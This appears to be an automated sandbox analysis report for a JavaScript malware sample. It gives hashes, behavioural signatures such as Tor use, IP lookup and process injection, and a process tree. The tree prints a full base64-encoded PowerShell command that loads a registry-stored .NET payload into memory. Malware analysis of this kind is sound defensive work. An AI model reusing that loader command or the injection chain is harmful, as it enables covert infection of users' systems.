Analysis
-
max time kernel
300s -
max time network
260s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
22-07-2021 09:26
Static task
static1
Behavioral task
behavioral1
Sample
malware.js
Resource
win7v20210410
General
-
Target
malware.js
-
Size
2.5MB
-
MD5
01ccfabf585a85f66195351871b9b467
-
SHA1
1b579fc4810d854da3bc59cc0024a368387423e4
-
SHA256
d0ac1b89cd4522882989b06c18ef2b80b05e07d64de1f562f79e2d631536fed3
-
SHA512
ce08769df3983ed9dd53189dcc1ad1887112cc65c8633a1fe333176afbe55194473e601df3c0757a0e2066d0c4b372f69e3706e5fa0d805dffec326807fdb05e
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
GetX64BTIT.exepid process 2196 GetX64BTIT.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 14 api.ipify.org 15 api.ipify.org -
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3724 set thread context of 788 3724 powershell.exe ImagingDevices.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeImagingDevices.exepid process 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe 788 ImagingDevices.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3724 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
ImagingDevices.exepid process 788 ImagingDevices.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
wscript.execmd.exepowershell.exeImagingDevices.exedescription pid process target process PID 656 wrote to memory of 3136 656 wscript.exe cmd.exe PID 656 wrote to memory of 3136 656 wscript.exe cmd.exe PID 3136 wrote to memory of 3724 3136 cmd.exe powershell.exe PID 3136 wrote to memory of 3724 3136 cmd.exe powershell.exe PID 3136 wrote to memory of 3724 3136 cmd.exe powershell.exe PID 3724 wrote to memory of 3384 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 3384 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 3384 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 3724 wrote to memory of 788 3724 powershell.exe ImagingDevices.exe PID 788 wrote to memory of 2196 788 ImagingDevices.exe GetX64BTIT.exe PID 788 wrote to memory of 2196 788 ImagingDevices.exe GetX64BTIT.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js1⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "2⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"4⤵PID:3384
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"5⤵
- Executes dropped EXE
PID:2196
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
MD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
MD5
14f8904cf8d36877990fa4f0743a8396
SHA18429f1370f2f08ddb81a06b16e0f40c309309ea3
SHA25642fe128c1f7cdef6532a8228d19a21dead95fef57ed326d64cb3833d347081c9
SHA512f7f6dcb8b0145362610e66b03ba55ad5fb9304ec5a713d8873b6b22b993d5ce7d248354adac9d285dd1d22a1e8678ff821d748cb8662fe39704a3ea8f8045469